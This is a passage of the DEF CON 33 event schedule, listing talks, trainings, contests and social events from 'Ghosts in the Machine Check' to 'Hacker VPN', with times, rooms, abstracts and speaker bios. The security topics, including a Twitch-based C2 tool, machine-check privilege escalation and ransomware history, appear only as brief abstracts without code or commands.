Title: Ghosts in the Machine Check - Conjuring Hardware Failures for Cross-ring Privilege Escalation
When: Friday, Aug 8, 12:30 - 13:15 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

Catastrophic hardware failures. From an aging I/O device to cosmic ray bit flips, memory degradation to CPU fires. When an unrecoverable hardware error is detected, the common platform response is to generate a Machine Check Exception, and shut down before the problem gets worse.

In this talk, we'll see what happens when we circumvent all the traditional fail safes. What happens when, instead of exceptionally rare failures from natural causes, we deliberately create these fatal events from software. When instead of a platform shutdown, we force the system to limp along, damaged but alive. We'll show how carefully injecting these signals during privileged CPU operations can disrupt secure transitions, how those disruptions progress to cascading system failures, and how to ride the chaos to gain hardware privilege escalation. Finally, we'll see how to undo the damage, recover from the unrecoverable, and let the system continue as if nothing happened - now with a foothold in privileged space, all through hardware failure events synthesized through software-only attacks.

We'll conclude by showing how to use this vector to reveal all-new hardware vulnerabilities, and walk through a brave new world of machine check research opportunities - for both attackers and defenders - across technologies and architectures.

SpeakerBio:  Christopher "xoreaxeaxeax" Domas

Christopher Domas (@xoreaxeaxeax) is a security researcher primarily focused on firmware, hardware, and low level processor exploitation. He is best known for releasing impractical solutions to non-existent problems, including the world's first single instruction C compiler (M/o/Vfuscator), toolchains for generating images in program control flow graphs (REpsych), and Turing-machines in the vi text editor. His more relevant work includes the sandsifter processor fuzzer, rosenbridge backdoor, the binary visualization tool ..cantor.dust.., and the memory sinkhole privilege escalation exploit.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 15:00-15:45 PDT


Title: Ghosts of REvil: An Inside Look with the Hacker Behind the Kaseya Ransomware Attack
When: Saturday, Aug 9, 15:00 - 15:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

Yaroslav Vasinskyi was sentenced in 2024 to 13 years in U.S. federal prison for his role in the $700M Kaseya ransomware attack. But behind the headlines lies a more human and complex story. Over the past year, threat researcher Jon DiMaggio built a relationship with Vasinskyi, speaking with him regularly by phone and email. Joining him is John Fokker, Head of Threat Intelligence at Trellix and former Dutch cybercrime investigator involved in operations targeting the REvil gang with global law enforcement.

This talk reveals how REvil operated from the inside, what really happened behind the Kaseya attack, and how ego, greed, and betrayal tore the crew apart. The session also provides new information on the group’s leadership, who vanished and remain at large.

This isn’t theory or speculation. It is raw human intelligence, operational insight, and criminal context behind one of the most devastating ransomware attacks in history. It also tells Vasinskyi’s personal journey, revealing the often overlooked human side of ransomware crime.

Coinciding with the next Ransomware Diaries release, this talk exposes the inner workings and unraveling of one of the most infamous ransomware groups of all time. This is not a glorification, it is a reckoning.

References:

Speakers:Jon DiMaggio,John Fokker

SpeakerBio:  Jon DiMaggio

Jon DiMaggio is the Chief Security Strategist at Analyst1 and a cybercrime hunter who doesn’t just follow ransomware gangs, he infiltrates them. A former U.S. intelligence analyst with a background in signals intelligence, Jon has spent his career going deep undercover inside some of the world’s most dangerous cybercrime syndicates. In 2024, he embedded himself within the notorious LockBit ransomware gang, gathering intelligence that helped law enforcement take down one of the most prolific cybercriminal operations in history.

His investigative series The Ransomware Diaries exposed LockBit’s inner workings and earned widespread recognition. Jon is the author of The Art of Cyberwarfare (No Starch Press), a two-time SANS Difference Makers Award winner, has appeared on 60 Minutes, and has been featured in The New York Times, Wired, and Bloomberg. He is also a regular speaker at DEFCON, RSA, and other major security conferences. Whether he’s chasing cybercriminals or telling their stories, Jon brings the kind of firsthand insight you only get when you’ve walked into the lion’s den, and walked out.

SpeakerBio:  John Fokker

As Head of Threat Intelligence at Trellix and former head of cyber investigations at the Dutch National High Tech Crime Unit, I bring deep technical knowledge and operational experience bridging law enforcement, intelligence, and private sector perspectives. My work has helped coordinate international takedowns of ransomware infrastructure, and I have direct experience investigating REvil and its affiliates at the height of their operations. My contribution complements Jon’s HUMINT narrative with:

• Technical validation of the behind-the-scenes activities discussed in the talk

• Law enforcement and intelligence insights on affiliate operations, infrastructure, and monetization patterns

• An investigative trail linking Revil and GandCrab, through shared TTPs and operational overlaps

Together, our presentation fuses Hacking, CTI, HUMINT and investigative storytelling with forensic rigor, revealing how trust, betrayal, and ego brought down one of the most feared ransomware gangs in the world.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 12:00-12:45 PDT


Title: GlytchC2 - Command Execution and Data Exfiltration of Any Kind Through Live Streaming Platforms
When: Saturday, Aug 9, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Glytch is a post-exploitation tool serving as a command-and-control and data exfiltration service. It creates a covert channel through Twitch live streaming platform and lets attackers execute OS commands or exfiltrate data of any kind from the target computer, regardless of whether the computers are connected over a LAN or WAN.

Speakers:Anil Celik,Emre Odaman

SpeakerBio:  Anil Celik

Anil graduated as a computer engineer and is currently an MSc student in information security engineering. He has 5+ years of professional experience and is working as a cyber security engineer at HAVELSAN, primarily focused on red team engagements and purple teaming. He holds 5+ CVEs and has OSCP and OSWP certifications.

SpeakerBio:  Emre Odaman

Graduated as a Computer Engineer and working as a Cyber Security Engineer at HAVELSAN for the past 3 years, which is a major defense industry company in Türkiye. His main areas of interest are red teaming, network security, OT, IoT & hardware security.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 15:00-15:45 PDT


Title: GlytchC2 - Command Execution and Data Exfiltration of Any Kind Through Live Streaming Platforms
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

Glytch is a post-exploitation tool serving as a command-and-control and data exfiltration service. It creates a covert channel through Twitch live streaming platform and lets attackers execute OS commands or exfiltrate data of any kind from the target computer, regardless of whether the computers are connected over a LAN or WAN.

Speakers:Anil Celik,Emre Odaman

SpeakerBio:  Anil Celik

Anil graduated as a computer engineer and is currently an MSc student in information security engineering. He has 5+ years of professional experience and is working as a cyber security engineer at HAVELSAN, primarily focused on red team engagements and purple teaming. He holds 5+ CVEs and has OSCP and OSWP certifications.

SpeakerBio:  Emre Odaman

Graduated as a Computer Engineer and working as a Cyber Security Engineer at HAVELSAN for the past 3 years, which is a major defense industry company in Türkiye. His main areas of interest are red teaming, network security, OT, IoT & hardware security.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 12:00-13:50 PDT


Title: GlytchC2: Command execution and data exfiltration of any kind through live streaming platforms
When: Friday, Aug 8, 12:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 2 - Map

Description:

Glytch is a post-exploitation tool serving as a Command-and-Control (C2) & Data Exfiltration service.

It creates a covert channel through Twitch live streaming platform and lets attacker to execute an OS command or exfiltrate a data of any kind from the target computer (does not matter whether the computers are connected over a LAN or WAN).

We have submitted our tool for Demo Labs already and we are planning to share it's development phase, ideas and challenges that we've faced.

https://github.com/ccelikanil/GlytchC2

Speakers:Anıl Çelik,Emre Odaman

SpeakerBio:  Anıl Çelik

Graduated as a Computer Engineer and currently a MSc student on Information Security Engineering. Has 5+ years professional experience and right now working as a Cyber Security Engineer at HAVELSAN, primarly focused on Red Team engagements & Purple Teaming. Holding 5+ CVEs and has OSCP & OSWP certifications.

SpeakerBio:  Emre Odaman

Graduated as a Computer Engineer and working as a Cyber Security Engineer at HAVELSAN for the past 3 years, which is a major defense industry company in Türkiye. His main areas of interest are red teaming, network security, OT, IoT & hardware security.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 15:00-16:50 PDT


Title: Go Hack Yourself: API Hacking for Beginners
When: Saturday, Aug 9, 15:00 - 16:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 3 - Map

Description:

Over the past few years, we've really seen API hacking take off as a field of its own, diverging from typical web app security, but yet parallel to it. Often we point to the amorphous blob that is web security and go: "here you go, now you can be a hacker too", with top 10 lists, write-ups, conference talks and whitepapers smiling as we do. This creates a major challenge for developers who want to test their APIs for security or just people who want to get into API hacking, how on earth do you wade through all the general web security to get to the meat of API hacking, what do you even need to know? This talk is going to break down API hacking from a developer point of view, teaching you everything you need to know about API hacking, from the bugs you can find and to the impact you can cause, to how you can easily test your own work or review your peers. So what are you waiting for join me and go hack yourself!

SpeakerBio:  Katie "InsiderPhD" Paxton-Fear, Principal Security Researcher at Traceable by Harness

Dr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep, in her words: she used to make applications and now she breaks them. A former API developer turned API hacker. She has found vulnerabilities in organizations ranging from the Department of Defense to Verizon, with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. As she shares some of the easy way hackers can exploit APIs and how they get away without a security alert! Dr Katie regularly delivers security training, security research, to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Friday - 11:00-11:59 PDT


Title: Go Malware Meets IoT: Challenges, Blind Spots, and Botnets
When: Friday, Aug 8, 11:00 - 11:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

AGo malware is showing up more often, especially in IoT environments. Its flexibility and ease of cross-compilation make it attractive to attackers, but it also makes life harder for analysts and defenders. Go binaries are large, statically compiled, and structured in ways that traditional tools are not designed to handle. The runtime is unfamiliar, and things like string extraction, function identification, and behavior analysis can quickly become frustrating. This talk looks at why Go malware is hard to analyze and why some detection tools struggle to keep up. We will walk through practical tips and tools to make reversing Go malware more manageable, including how to recover types, strings, and function information. To tie everything together, we will look at a recent real-world example: Pumabot, a Go-based botnet targeting IoT surveillance devices. We will dig into how it works, what it targets, and what artifacts it leaves behind. By the end of the session, you will have a better understanding of how attackers are using Go in the wild and how to be better prepared for the next time it shows up in your analysis queue.

SpeakerBio:  Asher Davila, IoT, ICS/OT, and 5G malware research lead at Palo Alto Networks
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CPV - Saturday - 10:00-10:59 PDT


Title: Gold Bug: Puzzle Panel with Friends
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 21:00-01:59 PDT


Title: GOTHCON
When: Saturday, Aug 9, 21:00 - 01:59 PDT
Where: LVCCWest-Level2-W231-W232 - Map

Description:

Returning for their 8th year, Gothcon invites you to come dance the night away with a line-up of some of the community's best dark dance music DJ's from across the US! Dress however you would like in whatever makes you feel comfortable and happy, and all are welcome.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 12:40-13:10 PDT


Title: Grandoreiro & friends: brazilian banking trojans tour outside Latin America
When: Friday, Aug 8, 12:40 - 13:10 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Josep Albors
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 15:30-15:59 PDT


Title: Grind vs Gleam: Building Reddit's DDoS Resilience
When: Friday, Aug 8, 15:30 - 15:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Deep dive into build vs buy for DDoS Prevention tools

Speakers:Pratik Lotia,Spencer Koch

SpeakerBio:  Pratik Lotia, Reddit
No BIO available
SpeakerBio:  Spencer Koch
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 10:00-10:55 PDT


Title: Growing Red Team Village: What We’ve Learned Building an Offensive Security Community
When: Saturday, Aug 9, 10:00 - 10:55 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

Join the founding members of Red Team Village as they share what they’ve learned building a community focused on offensive security education and discuss their evolution from hands-on leaders to mentors and advisors. From starting as a DEF CON village to growing into a 20,000+ member community, the founders will explore the complexities of building a successful community as well as the transition to letting others lead day-to-day operations.

This session covers the practical realities of community building and leadership evolution - managing volunteers, scaling membership, balancing content for different skill levels, and maintaining community culture during growth. The founders will share what worked in running the village operations, handling logistics at scale, and responding to community feedback to continuously improve the experience.

The discussion will address key questions about running and transitioning technical communities: How do you manage village operations effectively? What have you learned about scaling community management? How do you handle criticism and feedback constructively? How do you identify and develop new leaders? When and how do you step back without losing community culture? The founders will also cover practical aspects like managing large-scale events and evolving with community needs.

The session wraps up with Q&A where you can explore specific challenges around building technical communities, leadership transitions, and maintaining founding vision while empowering new voices.

Whether you’re involved in community building, thinking about starting something new, or wondering about sustainable leadership models, this panel offers honest perspectives from founders navigating the transition from builders to advisors.

Speakers:Barrett Darnell,Mike Lisi,Omar Santos,Savannah Lazzara,Wes Thurner

SpeakerBio:  Barrett Darnell
No BIO available
SpeakerBio:  Mike Lisi

Mike Lisi is the founder of Maltek Solutions, a consulting and solutions company as well as a seasoned professional in the field of cybersecurity. Mike is known for his expertise in network, web application, and API penetration testing, his contributions toward Capture The Flag (CTF) events, and support for college cybersecurity competitions. As the founder of Maltek Solutions, Michael has carved a path of excellence, establishing a dynamic and innovative cybersecurity company. His leadership and technical expertise drive Maltek Solutions to deliver top-notch security solutions to customers and partners throughout the country.

SpeakerBio:  Omar Santos

Omar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar's collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.

Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.

SpeakerBio:  Savannah Lazzara

Savannah Lazzara is a Security Engineer specializing in red teaming at a tech company. Savannah has multiple years of experience in security consulting working with many Fortune 500 corporations and has experience in carrying out security assessments, which include network assessments, social engineering exercises, physical facility penetration tests, and wireless assessments. Savannah also has experience in performing adversary simulation assessments, which include remote red team simulations, insider threat assessments, and onsite red team assessments. Savannahs area of expertise is focused on social engineering and physical security.

Savannah is a member of the Advisory Board for Red Team Village and co-authored ‘Redefining Hacking: A Comprehensive Guide to Red Teaming and Bug Bounty Hunting in an AI-Driven World’. She has spoken at several cybersecurity conferences, including Source Zero Con, BSides, and more. Savannah has also appeared on multiple podcasts, including The Hacker Factor and Hackerz and Haecksen.

SpeakerBio:  Wes Thurner
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CON - Friday - 10:00-17:59 PDT


Title: Hac-Mac Contest Booth Open
When: Friday, Aug 8, 10:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall1-W109 - Map

Description:

This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Players will only be able to turn in scavenger hunt items during Contest Area Operating Hours.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 10:00-17:59 PDT


Title: Hac-Mac Contest Booth Open
When: Saturday, Aug 9, 10:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall1-W109 - Map

Description:

This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Players will only be able to turn in scavenger hunt items during Contest Area Operating Hours.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Sunday - 10:00-12:59 PDT


Title: Hac-Mac Contest Booth Open
When: Sunday, Aug 10, 10:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall1-W109 - Map

Description:

This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Players will only be able to turn in scavenger hunt items during Contest Area Operating Hours.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Thursday - 12:00-12:59 PDT


Title: Hac-Man - Remote play available
When: Thursday, Aug 7, 12:00 - 12:59 PDT
Where: Unknown

Description:

This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Contest will continue operation on the Scramble.RogueSignal.io website outside of Contest Area Operating Hours until the Contest is closed.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Sunday - 12:00-12:59 PDT


Title: Hac-Man - Remote play available
When: Sunday, Aug 10, 12:00 - 12:59 PDT
Where: Unknown

Description:

This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Contest will continue operation on the Scramble.RogueSignal.io website outside of Contest Area Operating Hours until the Contest is closed.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Sunday - 12:00-12:59 PDT


Title: Hac-Man - Remote play available
When: Sunday, Aug 10, 12:00 - 12:59 PDT
Where: Unknown

Description:

This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Contest will continue operation on the Scramble.RogueSignal.io website outside of Contest Area Operating Hours until the Contest is closed.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Sunday - 12:00-12:59 PDT


Title: Hac-Man - Remote play available
When: Sunday, Aug 10, 12:00 - 12:59 PDT
Where: Unknown

Description:

This Pac-Man themed set of challenges takes Players on a journey through learning and demonstrating hacker and information security skills to earn points. With multiple subject-matter specific challenge groups and tracks, this hacker challenge game has something for everyone. Contest will continue operation on the Scramble.RogueSignal.io website outside of Contest Area Operating Hours until the Contest is closed.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 14:00-14:50 PDT


Title: Hack the Clock: Automating CVE Exploit searches to save time, money, and not get bored.
When: Friday, Aug 8, 14:00 - 14:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

In the fast-paced world of cybersecurity, time is of the essence. As vulnerabilities are discovered and threats evolve, the clock is always ticking, and staying ahead of exploits can feel like a race against time. Enter CVEpwn – an automation tool designed to streamline the search for CVE exploits across multiple platforms like GitHub, ExploitDB, and CXSecurity.

In this talk, we'll dive into the process of automating CVE exploit searches, demonstrating how CVEpwn cuts down on manual effort, accelerates response times, and enables faster vulnerability mitigation. By automating the search for CVE exploits using multiple platforms and APIs, this tool allows you to focus on what really matters: patching vulnerabilities before they get exploited.

SpeakerBio:  Jordan Bonagura

Jordan Bonagura is a senior security consultant for Secure Ideas. With more than 20 years of experience in information security, Jordan is passionate about helping companies and clients protect their data and applications from threats and vulnerabilities. As a principal security researcher, he led teams conducting vulnerability management, risk assessments, penetration tests, and boundary-setting to comply with standards for companies in different segments.

Jordan contributed to significant projects, such as developing an integrated GNSS positioning system and an encryption communication protocol between ground and satellite at the Brazilian National Institute of Space Research. He also had the opportunity to speak at some of the most important security conferences around the globe, be a college professor and course coordinator, and consult for the Brazilian police in crime solving.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Hack the Connected Plant!
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Tired of legacy ICS systems? Attend this training to hack the next generation of Industrial Control Systems! No more Modbus, no more standard PLC, no more Purdue model!

This training is designed to show what the future might look like for Industrial Control Systems, and how it will impact cybersecurity.

We’ll bring a realistic ICS setup that features all the fancy current and future trends: SD-WAN and Zero Trust, OPC-UA, MQTT, Edge device and soft-PLCs to control a small-scale industrial process simulation.

The first day will be dedicated to introducing the new cybersecurity challenges faced by modern Industrial Control Systems, and doing hands-on exercises on AWS pentesting, soft-PLC exploitation

On the second day we’ll reflect on the updated threat models and then we’ll spend the full day working on a realistic Capture-the-Flag exercise, where we’ll have to go from 0 to impacting a small industrial setup. The CTF will be guided, with answers given on a regular basis, so that all attendees can capture all the flags. We’ll end this exciting day with the takeaways of the exercise, and what could be done to prevent & detect the attacks we performed.

SpeakerBio:  Arnaud Soullié, Senior Manager at Wavestone

Arnaud Soullié is a Senior Manager at Wavestone, a global consulting company. For 15 years, he has been performing security assessments and pentests on all types of targets. He started specializing in ICS cybersecurity 10 years ago. He has spoken at numerous security conferences on ICS topics, including: BlackHat Europe, BruCon, 4SICS, BSides Las Vegas, and DEFCON. He is also the creator of the DYODE project, an open source data diode aimed at ICS. He has taught ICS cybersecurity trainings since 2015.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Hack the Connected Plant!
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Tired of legacy ICS systems? Attend this training to hack the next generation of Industrial Control Systems! No more Modbus, no more standard PLC, no more Purdue model!

This training is designed to show what the future might look like for Industrial Control Systems, and how it will impact cybersecurity.

We’ll bring a realistic ICS setup that features all the fancy current and future trends: SD-WAN and Zero Trust, OPC-UA, MQTT, Edge device and soft-PLCs to control a small-scale industrial process simulation.

The first day will be dedicated to introducing the new cybersecurity challenges faced by modern Industrial Control Systems, and doing hands-on exercises on AWS pentesting, soft-PLC exploitation

On the second day we’ll reflect on the updated threat models and then we’ll spend the full day working on a realistic Capture-the-Flag exercise, where we’ll have to go from 0 to impacting a small industrial setup. The CTF will be guided, with answers given on a regular basis, so that all attendees can capture all the flags. We’ll end this exciting day with the takeaways of the exercise, and what could be done to prevent & detect the attacks we performed.

SpeakerBio:  Arnaud Soullié, Senior Manager at Wavestone

Arnaud Soullié is a Senior Manager at Wavestone, a global consulting company. For 15 years, he has been performing security assessments and pentests on all types of targets. He started specializing in ICS cybersecurity 10 years ago. He has spoken at numerous security conferences on ICS topics, including: BlackHat Europe, BruCon, 4SICS, BSides Las Vegas, and DEFCON. He is also the creator of the DYODE project, an open source data diode aimed at ICS. He has taught ICS cybersecurity trainings since 2015.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 16:00-17:59 PDT


Title: Hack3r Runw@y Contest
When: Saturday, Aug 9, 16:00 - 17:59 PDT
Where: LVCCWest-Level1-Atrium-East-Contest Stage

Description:

What is Hack3r Runw@y?

Hack3r Runw@y challenges creative minds in the hacker community to reimagine fashion through the lens of hacking. We're calling all glamorous geeks, crafty coders, and fashionably functional folks to dust off their soldering irons, grab their needles and threads, and unleash their inner designers. Whether you're a seasoned maker or a coding newbie, Hack3r Runw@y has a place for you. Hint: You don't have to know how to program to make cool wearables.

What to Expect:

Participants will submit their creations prior to the event and then walk the runway during our allotted time at DEF CON. Audience should be prepared to be amazed by a runway show unlike any other. Like really. Witness creations that push the boundaries of fashion and technology, showcasing the ingenuity and resourcefulness of the hacker community.

Expect to see:

Smart Wear that Wows: Garments integrated with LEDs, microcontrollers, sensors, and other tech wizardry, creating dazzling displays of functionality and style. Digital Design that Dazzles: Visually stunning pieces that use light, color, and texture to create captivating, passive designs.

Functional Fashion: Practical and stylish creations that solve real-world problems, from masks and shields to lockpick earrings and cufflink shims.

Extraordinary Style: Unique and expressive designs that push the boundaries of fashion, incorporating everything from 3D textures and optical illusions to cosplay and security-inspired patterns.

A Hacker Perspective on Fashion:

Hack3r Runw@y brings a unique hacker perspective to DEF CON by demonstrating the power of creativity and problem-solving in a non-traditional context. It showcases how hacking can be applied to art and self-expression, blurring the lines between technology, fashion, and culture. It's about more than just making cool gadgets; it's about pushing boundaries, challenging conventions, and exploring the intersection of technology and human experience.

What You'll Learn:

Hack3r Runw@y offers attendees a glimpse into the creative potential of the hacker community. You'll see firsthand how technical skills can be combined with artistic vision to create truly unique and innovative designs. You'll be inspired by the ingenuity and resourcefulness of the participants, and you might even pick up some ideas for your own projects. It's a chance to learn about new technologies, see them applied in unexpected ways, and connect with a community of like-minded individuals. Hack3r Runw@y teamed up with the DC Maker Community during DEF CON 32 to offer a workshop on sewing LEDs to clothing. Look out for something similar this year.

The Competition:

Participants will compete in four categories for a chance to win in each, plus the coveted People’s Choice trophy, where anyone can win, but there will be a twist! Our esteemed judges will select winners based on:

Join us at DEF CON 33 for Hack3r Runw@y and witness the future of fashion! Be prepared to be amazed, inspired, and maybe even a little bit hacked. This is an event you won't want to miss!

Participant Prerequisites

There are no prerequisites outside of you wearing something that you made or had a hand in making. You are welcome to model store bought outfits, but you will not qualify for a prize.

Pre-Qualification

Proof that you created the item and signed up via the google form. Submissions due no later than 4pm EST on Saturday, August 10, 2024. Link to form found here: https://hack3rrunway.github.io/


Return to Index    -    Add to Google    -    ics Calendar file

CON - Friday - 20:00-21:59 PDT


Title: Hacker Jeopardy
When: Friday, Aug 8, 20:00 - 21:59 PDT
Where: Unknown

Description:

Have you ever wondered what would happen if you took ostensibly smart people, put them up on a stage, maybe provided a beer or two and started asking really tough technical questions like what port Telnet runs on? Well wonder no more! Back to start its 31st year at Defcon, Hacker Jeopardy will have you laughing, groaning and wondering where all the brain cells have gone. Some come share an evening of chanting DFIU followed immediately by someone FIU. This is a mature show, 18+.

Participant Prerequisites

None

Pre-Qualification

No


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 20:00-21:59 PDT


Title: Hacker Jeopardy
When: Saturday, Aug 9, 20:00 - 21:59 PDT
Where: Unknown

Description:

Have you ever wondered what would happen if you took ostensibly smart people, put them up on a stage, maybe provided a beer or two and started asking really tough technical questions like what port Telnet runs on? Well wonder no more! Back to start its 31st year at Defcon, Hacker Jeopardy will have you laughing, groaning and wondering where all the brain cells have gone. Some come share an evening of chanting DFIU followed immediately by someone FIU. This is a mature show, 18+.

Participant Prerequisites

None

Pre-Qualification

No


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 19:00-01:59 PDT


Title: Hacker Karaoke
When: Friday, Aug 8, 19:00 - 01:59 PDT
Where: LVCCWest-Level2-W211-W212 - Map

Description:

Two great things that go great together! Join the fun as your fellow hackers make their way through songs from every era and style. Everyone has a voice and this is your opportunity to show it off! Everyone is encourage to participate in a DEF CON tradition from all folks and skill levels.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 19:00-01:59 PDT


Title: Hacker Karaoke
When: Saturday, Aug 9, 19:00 - 01:59 PDT
Where: LVCCWest-Level2-W211-W212 - Map

Description:

Two great things that go great together! Join the fun as your fellow hackers make their way through songs from every era and style. Everyone has a voice and this is your opportunity to show it off! Everyone is encourage to participate in a DEF CON tradition from all folks and skill levels.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 11:00-14:50 PDT


Title: Hacker Troll House
When: Saturday, Aug 9, 11:00 - 14:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 2 - Map

Description:

Enter the Hacker Troll House to take on a variety of entry-level Linux security challenges against the Trolls. The Hacker Troll House challenges are short, timed, and will require you to think on your feet to beat the Trolls at their own game. But be warned, Trolls don't play fair! Basic Linux command line and file system knowledge recommended (bash scripting a plus).

SpeakerBio:  James Rice

Mr. James Rice has been cybersecurity faculty for the last decade in Upstate New York at Mohawk Valley Community College and more recently Rochester Institute of Technology. During this time, Mr. Rice has focused on developing numerous interactive gamified learning scenarios for the classroom and cyber competitions such as the NSA sponsored NCAE Cyber Games. Mr. Rice is currently pursuing his PhD at RIT in Computer Engineering and researching how to best leverage immersive reality technologies for data visualization and interaction, primarily in cyberspace.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 14:00-17:59 PDT


Title: Hacker VPN
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N257 - Map

Description:

The Internet is a dangerous place. Fortunately, hackers have created tools to make it safer. VPNs anonymize traffic but still expose IP addresses. Companies claim not to log, but how quickly will they hand over our data when they receive a warrant? Tor networks reroute traffic, but performance suffers as a result. Can we trust these distributed networks? Who owns the exit nodes? Finally, apps like Signal offer E2EE secure comms but in a proprietary and siloed way. Open source means very little if an app operates in a Walled Garden. Are there back doors? Is our data really safe?

In this workshop we'll create a Hacker VPN that combines the best of VPNs, Tor, and E2EE secure comms apps. We'll use modern-day PQC encryption to implement a secure protocol. We'll use both TCP/UDP as our network protocols to demonstrate flexibility in design. We'll support packet sharding, random noise injection, multi-hop routing, and 100% anonymity between network endpoints. We'll do all this on Linux with standard C++, CMake & OpenSSL. At the end of this workshop you'll have all the tools you need to take the Hacker VPN to the next level. Why trust outdated software from shady companies when you can build your own modern day, kick-ass implementation?

Yes, the Internet is a dangerous place. But it's much safer when we take control.

Speakers:Eijah,Benjamin "Cave Twink" Woodill

SpeakerBio:  Eijah, CEO, Founder at Code Siren, LLC

Eijah is the founder of Code Siren, LLC and has 25+ years of experience in software development. He is the creator of Polynom, the world's first CNSA Suite 2.0 PQC collaboration app. He is also the developer of Demonsaw, an encrypted communications platform that allows you to share information without fear of data collection or surveillance. Before that Eijah was a Lead Programmer at Rockstar Games where he created Grand Theft Auto V and Red Dead Redemption 2. In 2007, Eijah hacked multiple implementations of the Advanced Access Content System (AACS) protocol and released the first Blu-ray device keys under the pseudonym, ATARI Vampire. He has been a faculty member at multiple colleges, has spoken at DEF CON and other security conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.

SpeakerBio:  Benjamin "Cave Twink" Woodill

